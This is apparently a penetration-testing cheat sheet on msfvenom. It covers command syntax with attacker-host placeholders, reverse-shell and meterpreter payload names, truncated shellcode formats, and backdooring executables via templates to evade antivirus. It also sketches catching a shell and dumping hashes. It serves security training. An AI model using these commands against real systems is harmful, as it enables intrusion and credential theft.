Msfvenom
General syntax
$ msfvenom --payload <payload> --format <format> --platform <platform> --arch <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> --output <output_file>
# short form options
$ msfvenom -p <payload> -f <format> -p <platform> -a <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> -o <output_file>Help menu
List available options for module type
Payload option
General naming convention
<OS>/<architecture>/<payload>
OS: Operating system such as Windows, Linux, etc.Architecture: x64 or x86
32-bit by default, if not specified
Payload: reverse tcp, bind_tcp, etc.
Common payloads
32-bit variant
windows/shell/reverse_tcpwindows/shell_reverse_tcp
64-bit variant
windows/x64/shell/reverse_tcp|linux/x64/shell/reverse_tcpwindows/x64/shell_reverse_tcp|linux/x64/shell_reverse_tcpwindows/x64/meterpreter/reverse_tcp|linux/x64/meterpreter/reverse_tcpwindows/x64/meterpreter_reverse_tcp|linux/x64/meterpreter_reverse_tcp
Format option
Note: The output from msfvenom provides the shellcode (typically raw machine code) that can be executed on the target architecture, and is defined by the -p flag. The -f flag simply specifies the format for which the shellcode should be in.
Eg. Powershell
[Byte[]] $buf = 0xfc,0x48,0x83,...
Eg. C
unsigned char buf[] = "\xfc\x48\x83...
Eg. Python
buf = b""
buf += b"\xfc\x48\x8
buf += b"\...
Template
can be used to specify a custom executable file to be used as template
this means that the original functionality of the provided executable file will be fulfilled, but with the addition of the payload specified by an attacker
may bypass AV, etc.
CMD
Eg. Generate an x64 Windows .exe payload that executes a certain powershell.exe command (CMD option)
Example
linux/x86/meterpreter/reverse_tcp
Module to use on the attacking machine to catch a shell
exploit/multi/handler
Run the shellcode on the target machine
Gain meterpreter shell on the attacker machine
Using post exploitation hash dump module
Last updated